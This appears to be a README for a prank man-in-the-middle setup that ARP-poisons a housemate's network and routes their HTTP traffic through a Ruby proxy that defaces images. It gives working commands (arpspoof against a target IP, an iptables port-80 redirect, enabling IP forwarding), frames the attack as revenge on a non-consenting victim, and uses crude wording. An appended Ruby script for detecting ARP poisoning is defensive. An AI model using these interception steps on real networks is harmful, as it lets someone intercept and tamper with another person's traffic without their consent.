So. One of my housemates pranked me, and I decided to get my revenge. My revenge was 100% inspired by upside-down-ternet, and goes as follows:
- Linux box running the Ruby script below, which acts as a transparent proxy
- iptables rules on the Linux box route all port 80 requests through the proxy
- ARP poisoning routes all of the victim's traffic through the Linux box
- Proxy isn't actually transparent. It intercepts requests for images and does some processing on them, blurring them and writing a rude word in the middle.
- Hilarity and confusion ensue.

- Put proxy.rb somewhere on your Linux box/VM
- Install ImageMagick using your favourite method (you might also need to install some gscript fonts)
- Install the necessary gems:
    gem install eventmachine mini_magick dimensions
- Install the arpspoof tool, which might be in a package called dsniff
- Enable IP forwarding with
    echo 1 > /proc/sys/net/ipv4/ip_forward
- Route all port 80 traffic through the proxy with
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
  (assuming that the proxy runs on port 8080)
- Start the proxy:
    ruby proxy.rb
- Start ARP poisoning:
    arpspoof -i <eth device> [-t <target IP address>] <router IP address>

This software is entirely experimental and not entirely stable. Don't be too surprised if it crashes, is inefficient, etc. Also, it will rape your computer -- the blurring especially takes lots of CPU cycles.
It can't handle anything that isn't over HTTP. If they're using HTTPS, you're fecked.
Also, make sure your target doesn't get scared to the point of re-installing their OS ><
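
Seen from the target's side, the ARP poisoning step leaves a visible trace: the router's IP and another host's IP resolve to the same MAC address. The check below is an added example, not part of proxy.rb or the original write-up; the function names are hypothetical and the sample table (in `/proc/net/arp` format) is constructed with made-up addresses.

```ruby
# Constructed sample in /proc/net/arp format, as a host might see it while
# its gateway entry is poisoned. All addresses are made up.
SAMPLE_ARP_TABLE = <<~ARP
  IP address       HW type     Flags       HW address            Mask     Device
  192.168.1.1      0x1         0x2         02:00:00:aa:bb:01     *        eth0
  192.168.1.23     0x1         0x2         02:00:00:aa:bb:01     *        eth0
  192.168.1.40     0x1         0x2         02:00:00:cc:dd:02     *        eth0
  192.168.1.77     0x1         0x0         00:00:00:00:00:00     *        eth0
ARP

# Parse the table into [ip, mac, device] rows. The header line and
# incomplete entries (completion flag 0x2 not set, or all-zero MAC) are skipped.
def parse_arp_table(text)
  rows = text.lines.drop(1).map do |line|
    ip, _hw_type, flags, mac, _mask, dev = line.split
    next if mac.nil? || (flags.hex & 0x2).zero? || mac == "00:00:00:00:00:00"
    [ip, mac.downcase, dev]
  end
  rows.compact
end

# Report every MAC that answers for more than one IP on the same device.
# If the gateway is among those IPs, traffic meant for the router is being
# delivered to whichever host owns that MAC.
def find_arp_conflicts(text, gateway_ip)
  grouped = parse_arp_table(text).group_by { |_ip, mac, dev| [dev, mac] }
  grouped.select { |_key, rows| rows.size > 1 }.map do |(dev, mac), rows|
    ips = rows.map(&:first).sort
    { device: dev, mac: mac, ips: ips, gateway_affected: ips.include?(gateway_ip) }
  end
end

if __FILE__ == $PROGRAM_NAME
  # On a live Linux host, pass File.read("/proc/net/arp") instead of the sample.
  find_arp_conflicts(SAMPLE_ARP_TABLE, "192.168.1.1").each do |c|
    tag = c[:gateway_affected] ? "GATEWAY AFFECTED" : "duplicate MAC"
    puts "#{tag}: #{c[:mac]} on #{c[:device]} claims #{c[:ips].join(', ')}"
  end
end
```

A shared MAC is not always hostile: proxy ARP and hosts with several addresses on one interface produce the same pattern, so treat a hit as a prompt to compare against the router's known MAC.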